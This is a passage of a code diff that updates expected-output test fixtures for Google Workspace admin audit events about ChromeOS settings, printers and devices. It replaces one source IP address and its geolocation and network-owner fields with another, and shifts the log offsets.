@@ -402,7 +374,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -417,26 +389,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 3641, + "log.offset": 3634, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -457,7 +425,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -469,26 +437,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 4151, + "log.offset": 4143, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -509,7 +473,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}", "event.provider": "admin", "event.type": [ "deletion" 
@@ -521,26 +485,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 4546, + "log.offset": 4537, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -561,7 +521,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -575,26 +535,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 4941, + "log.offset": 4931, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -615,7 +571,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -627,26 +583,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5406, + "log.offset": 5395, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -667,7 +619,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}", "event.provider": "admin", "event.type": [ "deletion" 
@@ -679,26 +631,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5792, + "log.offset": 5780, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -719,7 +667,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -733,26 +681,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 6178,
+ "log.offset": 6165,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -774,7 +718,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -789,26 +733,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 6634,
+ "log.offset": 6620,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -830,7 +770,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_USER_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_USER_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -845,26 +785,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 7135,
+ "log.offset": 7120,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -885,7 +821,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"ISSUE_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_COMMAND_DETAILS\",\"multiValue\":[\"command\",\"-a\"]},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"ISSUE_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_COMMAND_DETAILS\",\"multiValue\":[\"command\",\"-a\"]},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "info"
@@ -902,26 +838,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 7635,
+ "log.offset": 7619,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -942,7 +874,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"MOVE_DEVICE_TO_ORG_UNIT_DETAILED\",\"parameters\":[{\"name\":\"DEVICE_NEW_ORG_UNIT\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_ORG_UNIT\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"MOVE_DEVICE_TO_ORG_UNIT_DETAILED\",\"parameters\":[{\"name\":\"DEVICE_NEW_ORG_UNIT\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_ORG_UNIT\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -957,26 +889,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 8124,
+ "log.offset": 8107,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -997,7 +925,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"REMOVE_CHROME_OS_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"1234\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"REMOVE_CHROME_OS_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"1234\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "deletion"
@@ -1009,26 +937,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 8657,
+ "log.offset": 8639,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
